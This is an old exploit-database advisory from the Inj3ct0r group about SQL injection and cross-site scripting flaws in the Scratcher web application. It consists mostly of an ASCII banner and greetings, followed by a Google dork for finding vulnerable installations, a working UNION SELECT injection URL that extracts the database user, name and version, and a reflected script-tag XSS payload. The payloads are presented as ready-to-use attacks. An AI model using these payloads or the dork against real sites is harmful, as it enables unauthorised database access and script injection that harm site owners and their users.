[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Scratcher (SQL/XSS) Multiple Remote Vulnerability
# Published : 2010-04-29
# Author : cr4wl3r
# Previous Title : chCounter indirect SQL Injection and XSS Vulnerabilities
# Next Title : Joomla JE Property Finder Component Upload Vulnerability


[+] Scratcher (SQL/XSS) Multiple Remote Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / __  /'__`                   0
0  /_,     ___   /_/_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/__<_  /'___  /    /`'__          0
0       / /    /   / __/  _  _   /           1
1       _ _ __   ____/ ____\ __\ ____/ _           0
0       /_//_//_/ _ /___/  /____/ /__/ /___/  /_/           1
1                   ____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Discovered By: cr4wl3r
Download: http://sourceforge.net/projects/scratcher/files/
Dork: "Powered by Scratcher"
Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

Thanks to: str0ke, opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
           EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
           SENOT, devilbat, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] Exploit SQL:
http://server/[path]/projects.php?id=[SQL]
http://server/[path]/projects.php?id=1+union+select+0,1,concat_ws(user(),0x3a,database(),0x3a,version()),3,4,5,6--

[+] Exploit XSS:
http://server/[path]/projects.php?show=[XSS]
http://server/[path]/projects.php?show=<script>alert(1)</script>